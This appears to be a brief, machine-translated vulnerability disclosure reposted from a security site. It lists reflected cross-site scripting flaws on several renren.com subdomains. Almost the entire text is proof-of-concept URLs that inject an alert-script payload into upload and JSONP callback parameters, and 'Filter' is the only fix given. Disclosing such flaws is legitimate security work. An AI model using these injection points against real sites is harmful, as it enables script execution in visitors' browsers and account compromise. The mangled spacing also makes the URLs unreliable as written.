Http://menexpert.renren.com/home.html
Two more reflection xss
Http://upload.renren.com/upload.fcgi? Pagetype = addphotoflash & hostid = 259069614 & tick = Success & block_index = 0 & block_count = 1 & uploadid = fileIte "/> <script> alert (/goderci/) </script> m7311161_1
Http://interface.game.renren.com/restServer.php? Method = Code. checkCode_jsonb & check_code = zdt9 & callback = % 22/% 3E % 3 Cscript % 3 Ealert % 28/goderci/% 29% 3C/script % 3E
Www.2cto.com
Http://motodefy.renren.com/video.html#showdiv
Two more reflection xss
Http://base.yx.renren.com/RestAPI? Method = api. base. getLoginUser & format = 2 & callback = % 22/% 3E % 3 Cscript % 3 Ealert % 28/goderci/% 29% 3C/script % 3E [IE6]
Http://shine.yx.renren.com/service.do? Template = api.com. login & format = jsonp & callback = jQu <script> alert (/goderci/) </script> ery17213305711311195436_1336037110832 & _ = 1336037111387
Solution: Filter
By goderci